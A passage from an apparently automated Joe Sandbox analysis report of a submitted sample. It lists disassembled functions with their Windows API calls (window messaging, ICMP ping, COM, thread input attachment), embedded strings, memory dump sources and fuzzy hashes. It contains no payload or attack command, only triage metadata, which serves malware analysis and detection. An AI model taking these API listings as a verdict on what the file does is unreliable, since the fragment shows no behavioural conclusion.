                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                            • String ID: static
                                                                            • API String ID: 2559357485-2160076837
                                                                            • Opcode ID: 6f8e947bb41eb0b81292ba93175e73ac43769d3193c9d5eeba61ec967d40eef6
                                                                            • Instruction ID: aae37fd3ae6728b4c15dea845969002121935cb7ea5c839dfabcc45e4fc705cd
                                                                            • Opcode Fuzzy Hash: 6f8e947bb41eb0b81292ba93175e73ac43769d3193c9d5eeba61ec967d40eef6
                                                                            • Instruction Fuzzy Hash: 47318B31140618ABDF239FA4DC49FEA3B6DFF0A364F114214FA19A60E0C736D811DBA4
                                                                            Function 00346F02 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                            • String ID: 0.0.0.0
                                                                            • API String ID: 2620052-3771769585
                                                                            • Opcode ID: 860f64feab4280926e1a902e3dba29189a1eff900972ff07fe985e07c343afde
                                                                            • Instruction ID: ccce0e660618469b8638555fa3bb5437baba16f495b06feb11e0aeb899884d7b
                                                                            • Opcode Fuzzy Hash: 860f64feab4280926e1a902e3dba29189a1eff900972ff07fe985e07c343afde
                                                                            • Instruction Fuzzy Hash: BD11B471504215AFDB27AF60AC4AEDA77ACEF45710F0100A5F545AE092EF70AE898B51
                                                                            Function 0032500E Relevance: 16.8, APIs: 11, Instructions: 257COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 00325047
                                                                              • Part of subcall function 00327C0E: __getptd_noexit.LIBCMT ref: 00327C0E
                                                                            • __gmtime64_s.LIBCMT ref: 003250E0
                                                                            • __gmtime64_s.LIBCMT ref: 00325116
                                                                            • __gmtime64_s.LIBCMT ref: 00325133
                                                                            • __allrem.LIBCMT ref: 00325189
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003251A5
                                                                            • __allrem.LIBCMT ref: 003251BC
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003251DA
                                                                            • __allrem.LIBCMT ref: 003251F1
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0032520F
                                                                            • __invoke_watson.LIBCMT ref: 00325280
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                            • String ID:
                                                                            • API String ID: 384356119-0
                                                                            • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                            • Instruction ID: 495695f8aae6660d59e21b9ad7365ef1b3f35526cd096c927f51728a0ee60544
                                                                            • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                            • Instruction Fuzzy Hash: E2710A72A01F26ABD7169E79DC82B5A73A8BF10764F158629F410DB6C1E770DE4087D0
                                                                            Function 00344DDD Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 00344DF8
                                                                            • GetMenuItemInfoW.USER32(003C1708,000000FF,00000000,00000030), ref: 00344E59
                                                                            • SetMenuItemInfoW.USER32(003C1708,00000004,00000000,00000030), ref: 00344E8F
                                                                            • Sleep.KERNEL32(000001F4), ref: 00344EA1
                                                                            • GetMenuItemCount.USER32(?), ref: 00344EE5
                                                                            • GetMenuItemID.USER32(?,00000000), ref: 00344F01
                                                                            • GetMenuItemID.USER32(?,-00000001), ref: 00344F2B
                                                                            • GetMenuItemID.USER32(?,?), ref: 00344F70
                                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00344FB6
                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00344FCA
                                                                            • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00344FEB
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                            • String ID:
                                                                            • API String ID: 4176008265-0
                                                                            • Opcode ID: 977b8abb2208372f453e2921535f9f2abc345f6f3ca6282098cf83118cde2616
                                                                            • Instruction ID: 34f2ab1a7790ebaae71c11549faeadffdba0601ecca7c3419eccb2b9d711d684
                                                                            • Opcode Fuzzy Hash: 977b8abb2208372f453e2921535f9f2abc345f6f3ca6282098cf83118cde2616
                                                                            • Instruction Fuzzy Hash: 86618B71900359AFDB22CFA4D888EAE7BF8FB01308F15006AF441AB291D731BD49DB21
                                                                            Function 00369C16 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00369C98
                                                                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00369C9B
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00369CBF
                                                                            • _memset.LIBCMT ref: 00369CD0
                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00369CE2
                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00369D5A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$LongWindow_memset
                                                                            • String ID:
                                                                            • API String ID: 830647256-0
                                                                            • Opcode ID: d45c013366fa2cff6c92e1eb8ae1290777560b65dff8415d08e9b1da7ac65e55
                                                                            • Instruction ID: 05210265b8ee786c9e5fda6f9fef0093fb728092baba77d44faf72fb48a6ffe7
                                                                            • Opcode Fuzzy Hash: d45c013366fa2cff6c92e1eb8ae1290777560b65dff8415d08e9b1da7ac65e55
                                                                            • Instruction Fuzzy Hash: 89616C75A00208AFDB12DFA4CC81FEEB7B8EB09714F14415AFA05EB292D770AD51DB50
                                                                            Function 003394E1 Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 003394FE
                                                                            • SafeArrayAllocData.OLEAUT32(?), ref: 00339549
                                                                            • VariantInit.OLEAUT32(?), ref: 0033955B
                                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 0033957B
                                                                            • VariantCopy.OLEAUT32(?,?), ref: 003395BE
                                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 003395D2
                                                                            • VariantClear.OLEAUT32(?), ref: 003395E7
                                                                            • SafeArrayDestroyData.OLEAUT32(?), ref: 003395F4
                                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 003395FD
                                                                            • VariantClear.OLEAUT32(?), ref: 0033960F
                                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0033961A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                            • String ID:
                                                                            • API String ID: 2706829360-0
                                                                            • Opcode ID: a2bf1de25cc88f25b69eb69c39c57d5798465175c01e184ae2b3c51c9dbc303b
                                                                            • Instruction ID: 8c7e780f98eccbda8a90812f222e7fa206e323d6309ff3fed945665d2813c230
                                                                            • Opcode Fuzzy Hash: a2bf1de25cc88f25b69eb69c39c57d5798465175c01e184ae2b3c51c9dbc303b
                                                                            • Instruction Fuzzy Hash: C7414F31900219EFDB02EFA5D884ADEBB7DFF08354F008065E542A7261DB70EA85CBA0
                                                                            Function 0035BB08 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 264COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$ClearInit$_memset
                                                                            • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$h?;$|?;
                                                                            • API String ID: 2862541840-649644195
                                                                            • Opcode ID: 6f264ba66409016886f096a4afa0d5761540c4cbc575eb621dd65bf6be37d444
                                                                            • Instruction ID: 32d60ec4d0ab6507afdac5e57d8457b037945d4b3b5ff0ffd96c6250d27dfe1f
                                                                            • Opcode Fuzzy Hash: 6f264ba66409016886f096a4afa0d5761540c4cbc575eb621dd65bf6be37d444
                                                                            • Instruction Fuzzy Hash: C4919071A00219EBDF26DF95C844FEEBBB8EF45711F108159F915AB2A0DB709948CFA0
                                                                            Function 0035ADAE Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0030936C: __swprintf.LIBCMT ref: 003093AB
                                                                              • Part of subcall function 0030936C: __itow.LIBCMT ref: 003093DF
                                                                            • CoInitialize.OLE32 ref: 0035ADF6
                                                                            • CoUninitialize.OLE32 ref: 0035AE01
                                                                            • CoCreateInstance.OLE32(?,00000000,00000017,0038D8FC,?), ref: 0035AE61
                                                                            • IIDFromString.OLE32(?,?), ref: 0035AED4
                                                                            • VariantInit.OLEAUT32(?), ref: 0035AF6E
                                                                            • VariantClear.OLEAUT32(?), ref: 0035AFCF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                            • API String ID: 834269672-1287834457
                                                                            • Opcode ID: 94680f7ca073971bf6045f251f348316ff1fa485df2fb632dd4a918f537227b1
                                                                            • Instruction ID: fb5a2fe908e3c0a4df480e3cd16e86dd92b688c6e5bfb5eb230d8b3be34c8023
                                                                            • Opcode Fuzzy Hash: 94680f7ca073971bf6045f251f348316ff1fa485df2fb632dd4a918f537227b1
                                                                            • Instruction Fuzzy Hash: 8861BF70208B119FC712EF54C889F6EBBE8AF49715F004649F9859B2A1C770ED48DB93
                                                                            Function 00358107 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WSAStartup.WSOCK32(00000101,?), ref: 00358168
                                                                            • inet_addr.WSOCK32(?,?,?), ref: 003581AD
                                                                            • gethostbyname.WSOCK32(?), ref: 003581B9
                                                                            • IcmpCreateFile.IPHLPAPI ref: 003581C7
                                                                            • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00358237
                                                                            • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 0035824D
                                                                            • IcmpCloseHandle.IPHLPAPI(00000000), ref: 003582C2
                                                                            • WSACleanup.WSOCK32 ref: 003582C8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                            • String ID: Ping
                                                                            • API String ID: 1028309954-2246546115
                                                                            • Opcode ID: 6b54a78f7ad0c9dda3cbaa2ed3d6057e8ffe42b0c5c4392ec76a4c39fa288546
                                                                            • Instruction ID: 65ac09c3dde7ef5037428bc9ad7f4778506044dd57138e1ace456eba703903a6
                                                                            • Opcode Fuzzy Hash: 6b54a78f7ad0c9dda3cbaa2ed3d6057e8ffe42b0c5c4392ec76a4c39fa288546
                                                                            • Instruction Fuzzy Hash: F851C2316047009FD712AF24CC45F6ABBE8AF48711F048959FE95EB2E1DB30E905CB41
                                                                            Function 0034E389 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0034E396
                                                                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0034E40C
                                                                            • GetLastError.KERNEL32 ref: 0034E416
                                                                            • SetErrorMode.KERNEL32(00000000,READY), ref: 0034E483
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Error$Mode$DiskFreeLastSpace
                                                                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                            • API String ID: 4194297153-14809454
                                                                            • Opcode ID: 47c4129653b5d2a7ba56cb92f68a1caa4ac3165252001a3dc989b8cf7c01f632
                                                                            • Instruction ID: 589a4741c23b84b31d3d2ec2e4f02f04a0e5e35773d0f8fdd0461c79a79fa63a
                                                                            • Opcode Fuzzy Hash: 47c4129653b5d2a7ba56cb92f68a1caa4ac3165252001a3dc989b8cf7c01f632
                                                                            • Instruction Fuzzy Hash: 74316135A002099FDB03EBA5C995AEDBBF8FF44344F158055E606AF3D1DB70AA01CB51
                                                                            Function 0033B907 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 0033B98C
                                                                            • GetDlgCtrlID.USER32 ref: 0033B997
                                                                            • GetParent.USER32 ref: 0033B9B3
                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 0033B9B6
                                                                            • GetDlgCtrlID.USER32(?), ref: 0033B9BF
                                                                            • GetParent.USER32(?), ref: 0033B9DB
                                                                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 0033B9DE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$CtrlParent
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 1383977212-1403004172
                                                                            • Opcode ID: 9471eebde8112419341b42f98d1e8b14c04125f247b3105e33586354c67cd7d0
                                                                            • Instruction ID: e60b64038fca0e711a52bd3a9322a344c691ab1b2677986a4f444b4b51e98dd1
                                                                            • Opcode Fuzzy Hash: 9471eebde8112419341b42f98d1e8b14c04125f247b3105e33586354c67cd7d0
                                                                            • Instruction Fuzzy Hash: 4F21F5B4900208BFDB06ABA4DCD6EFEBB78EF49300F500259F651972E2DB745815DB20
                                                                            Function 0033B9F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 0033BA73
                                                                            • GetDlgCtrlID.USER32 ref: 0033BA7E
                                                                            • GetParent.USER32 ref: 0033BA9A
                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 0033BA9D
                                                                            • GetDlgCtrlID.USER32(?), ref: 0033BAA6
                                                                            • GetParent.USER32(?), ref: 0033BAC2
                                                                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 0033BAC5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$CtrlParent
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 1383977212-1403004172
                                                                            • Opcode ID: 55eaea45d0861eb97aa7d07e85771afd5cfe307ec301f5a6669755120ea7bcd9
                                                                            • Instruction ID: 919b84bb0da274b777531960df614f3892cec891f4fd83757b40255fa2a886e6
                                                                            • Opcode Fuzzy Hash: 55eaea45d0861eb97aa7d07e85771afd5cfe307ec301f5a6669755120ea7bcd9
                                                                            • Instruction Fuzzy Hash: 1121D4B4A00208BFDB02EBA4DC95EFEBB79EF45300F500155FA51A71E2EBB55919DB20
                                                                            Function 0033BAD7 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetParent.USER32 ref: 0033BAE3
                                                                            • GetClassNameW.USER32(00000000,?,00000100), ref: 0033BAF8
                                                                            • _wcscmp.LIBCMT ref: 0033BB0A
                                                                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0033BB85
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: ClassMessageNameParentSend_wcscmp
                                                                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                            • API String ID: 1704125052-3381328864
                                                                            • Opcode ID: 318323db73818ae91e509003ebcaf7457c1f020ed521a034a58678acae6702af
                                                                            • Instruction ID: 9688c2e88dd167413df78de316cbf11f40340e9a307380ca01aee32e6e8b3d70
                                                                            • Opcode Fuzzy Hash: 318323db73818ae91e509003ebcaf7457c1f020ed521a034a58678acae6702af
                                                                            • Instruction Fuzzy Hash: 48110276648307FAFA276624EC57DE7F79C9F21724F200122FB14E84D6FFA1A8514624
                                                                            Function 0035B2A9 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VariantInit.OLEAUT32(?), ref: 0035B2D5
                                                                            • CoInitialize.OLE32(00000000), ref: 0035B302
                                                                            • CoUninitialize.OLE32 ref: 0035B30C
                                                                            • GetRunningObjectTable.OLE32(00000000,?), ref: 0035B40C
                                                                            • SetErrorMode.KERNEL32(00000001,00000029), ref: 0035B539
                                                                            • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 0035B56D
                                                                            • CoGetObject.OLE32(?,00000000,0038D91C,?), ref: 0035B590
                                                                            • SetErrorMode.KERNEL32(00000000), ref: 0035B5A3
                                                                            • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0035B623
                                                                            • VariantClear.OLEAUT32(0038D91C), ref: 0035B633
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                            • String ID:
                                                                            • API String ID: 2395222682-0
                                                                            • Opcode ID: 5271fd2d5b2f83b2c444ce0e7862a44c25ba5b3e7ec44caf043b50e77cc5bfba
                                                                            • Instruction ID: 137dc624e33e23f6cd239cc09c30a308541651553c58359459979c074374b42a
                                                                            • Opcode Fuzzy Hash: 5271fd2d5b2f83b2c444ce0e7862a44c25ba5b3e7ec44caf043b50e77cc5bfba
                                                                            • Instruction Fuzzy Hash: A5C123B1608305AFC705DF69C884D2BB7E9BF89305F00495DF98A9B261DB71ED09CB52
                                                                            Function 00344025 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 00344047
                                                                            • GetForegroundWindow.USER32(00000000,?,?,?,?,?,003430A5,?,00000001), ref: 0034405B
                                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 00344062
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003430A5,?,00000001), ref: 00344071
                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 00344083
                                                                            • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,003430A5,?,00000001), ref: 0034409C
